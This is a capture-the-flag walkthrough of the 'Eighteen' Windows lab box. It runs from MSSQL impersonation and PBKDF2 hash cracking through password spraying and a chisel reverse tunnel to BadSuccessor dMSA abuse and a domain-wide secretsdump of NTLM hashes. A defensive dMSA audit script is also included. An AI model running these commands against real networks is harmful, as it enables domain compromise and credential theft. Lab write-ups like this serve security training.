Basic information

As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!

Port scan

Three ports are open: 80, 1433 and 5985:

$ nmap -sC -sV -Pn 10.10.11.95
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-21 20:08 JST
Nmap scan report for 10.10.11.95
Host is up (0.19s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-21T11:31:42
|_Not valid after: 2055-11-21T11:31:42
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-11-21T17:41:51+00:00; +6h31m25s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h31m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.03 seconds

80

The site redirects to eighteen.htb, so add a hosts entry first:

10.10.11.95 eighteen.htb

It is the corporate site of a financial-management company:

You can register and log in with anything, but there is nothing useful there for now:

mssql

The provided credentials can connect to MSSQL, but only as guest:

python3 examples/mssqlclient.py eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.10.11.95

The usual xp_dirtree trick does coerce an authentication from the mssqlsvc account, but its hash does not crack.

appdev & financial_planner

However, it turns out we can impersonate the appdev user, and that user can see a financial_planner database:

That database contains a users table, from which we obtain the admin hash:

SQL (appdev  appdev@financial_planner)> SELECT name FROM sys.tables;
SQL (appdev appdev@financial_planner)> SELECT * FROM users;

pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133

Cracking it is slightly more work; you can have GPT generate a script, but I just used someone else's:

$ python3 crack.py
[*] Iniciando fuerza bruta PBKDF2-SHA256...
[+] Probadas 0 contraseñas...
[✔] Contraseña encontrada: iloveyou1

(There are ready-made tools for this, actually):

rid brute

Having the password, we still need a username; nxc can now RID-brute over MSSQL to enumerate usernames:

nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth | cut -d ':' -f2 | cut -d '\' -f2  > users.txt

# Then tidy up the output by hand, keeping only the account names
Administrator
Guest
krbtgt
DC01$
DnsAdmins
DnsUpdateProxy
mssqlsvc
SQLServer2005SQLBrowserUser$DC01
HR
IT
Finance
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green

Then spray the recovered password against those usernames; one valid pair turns up:

nxc winrm 10.10.11.95 -u users.txt -p 'iloveyou1'

WINRM 10.10.11.95 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

crack.py

import hashlib
import sys

# =========================
# Hash configuration
# =========================
# Pieces of the stored value pbkdf2:sha256:600000$<salt>$<hexdigest>
target_hash = '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'
salt = b'AMtzteQIG7yAbZIa'
iterations = 600000

# =========================
# Path to the wordlist
# =========================
wordlist_path = '/path/rockyou.txt'

# =========================
# Derive a key for each candidate and compare it with the target
# =========================
def crack_password():
    try:
        with open(wordlist_path, 'r', encoding='latin-1') as f:
            for idx, line in enumerate(f):
                password = line.strip()
                derived_key = hashlib.pbkdf2_hmac(
                    'sha256',
                    password.encode(),
                    salt,
                    iterations
                )
                hex_key = derived_key.hex()

                if hex_key == target_hash:
                    print(f"[✔] Contraseña encontrada: {password}")
                    return
                if idx % 100000 == 0:
                    print(f"[+] Probadas {idx} contraseñas...")

        print("[✘] No se encontró la contraseña en el diccionario.")
    except FileNotFoundError:
        print(f"[!] Archivo no encontrado: {wordlist_path}")
        sys.exit(1)

if __name__ == "__main__":
    print("[*] Iniciando fuerza bruta PBKDF2-SHA256...")
    crack_password()

user flag

Log in over WinRM with the valid username and password:

evil-winrm -i 10.10.11.95 -u adam.scott -p iloveyou1

dMSA Abuse to root

This step needs a hint and some background knowledge: the server is Windows Server 2025, so the dMSA abuse technique (BadSuccessor) applies:

Import-Module .\BadSuccessor.ps1

BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "bad_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"

# Set up a proxy into the target, then request tickets
# local
$ ./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse
# target
.\chisel.exe client 10.10.14.7:9999 R:socks

# Sync the clock (Kerberos needs it; the target only exposes a handful of ports, so fixtime.py uses HTTP)
$ sudo python3 fixtime.py -u http://10.10.11.95

# Request the dMSA ticket
$ proxychains4 python3 examples/getST.py eighteen.htb/adam.scott:iloveyou1 -impersonate 'bad_DMSA$' -dc-ip 10.10.11.95 -dmsa -self

# Use the dMSA ticket to obtain a service ticket
$ export KRB5CCNAME=bad_DMSA\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
proxychains4 python3 examples/getST.py eighteen.htb/'bad_DMSA$' -k -no-pass -dc-ip 10.10.11.95 -spn cifs/dc01.eighteen.htb

# Use the service ticket
export KRB5CCNAME=bad_DMSA\$@cifs_dc01.eighteen.htb@EIGHTEEN.HTB.ccache
proxychains4 python3 examples/secretsdump.py -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip 10.10.11.95

0b133be956bfaddf9cea56701affddec
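As an added defender-side example (not part of the original writeup), this audits dMSA objects for the trace the step above leaves in the directory: a dMSA whose msDS-ManagedAccountPrecededByLink points at a privileged account, especially one created outside the Managed Service Accounts container (here, OU=Staff) and whose msDS-DelegatedMSAState already says the migration completed. The records are constructed samples standing in for an LDAP search for objectClass=msDS-DelegatedManagedServiceAccount; the function name and the privileged-DN list are my own.

```python
# Attribute names follow the Windows Server 2025 dMSA schema; the records are
# constructed samples, not real LDAP results from the box.
PRIVILEGED_DNS = {
    "CN=Administrator,CN=Users,DC=eighteen,DC=htb",
    "CN=krbtgt,CN=Users,DC=eighteen,DC=htb",
}

SAMPLE_DMSAS = [
    {   # what a BadSuccessor run against OU=Staff would leave behind
        "distinguishedName": "CN=bad_DMSA,OU=Staff,DC=eighteen,DC=htb",
        "msDS-ManagedAccountPrecededByLink": ["CN=Administrator,CN=Users,DC=eighteen,DC=htb"],
        "msDS-DelegatedMSAState": 2,      # 2 = migration completed
    },
    {   # a legitimate migration: unprivileged predecessor, default container
        "distinguishedName": "CN=svc_web,CN=Managed Service Accounts,DC=eighteen,DC=htb",
        "msDS-ManagedAccountPrecededByLink": ["CN=svc_web_old,CN=Users,DC=eighteen,DC=htb"],
        "msDS-DelegatedMSAState": 2,
    },
    {   # a brand-new dMSA that never superseded anything
        "distinguishedName": "CN=svc_new,CN=Managed Service Accounts,DC=eighteen,DC=htb",
        "msDS-ManagedAccountPrecededByLink": [],
        "msDS-DelegatedMSAState": 0,
    },
]


def find_suspicious_dmsas(dmsas, privileged_dns=PRIVILEGED_DNS):
    """Return one finding per (dMSA, predecessor) pair that deserves a look."""
    findings = []
    for obj in dmsas:
        dn = obj["distinguishedName"]
        for pred in obj.get("msDS-ManagedAccountPrecededByLink", []):
            reasons = []
            if pred in privileged_dns:
                reasons.append("predecessor is a privileged account")
            if ",CN=Managed Service Accounts," not in dn:
                reasons.append("dMSA created outside the Managed Service Accounts container")
            if not reasons:
                continue                      # ordinary migration, nothing to report
            if obj.get("msDS-DelegatedMSAState") == 2:
                reasons.append("state 2 (completed): the dMSA already inherits the predecessor's rights")
            findings.append({"dmsa": dn, "predecessor": pred, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_dmsas(SAMPLE_DMSAS):
        print(f["dmsa"], "<-", f["predecessor"], "|", "; ".join(f["reasons"]))
```

In a live audit, the same function can be fed the results of an LDAP query for that object class, and the hit should be paired with a review of who holds CreateChild rights on the OU where the dMSA appeared.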

root flag

Then log in with the Administrator hash:

$ evil-winrm -i 10.10.11.95 -u Administrator -H 0b133be956bfaddf9cea56701affddec

hashdump

proxychains4 python3 examples/secretsdump.py -k -no-pass dc01.eighteen.htb -just-dc-ntlm -dc-ip 10.10.11.95

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::

References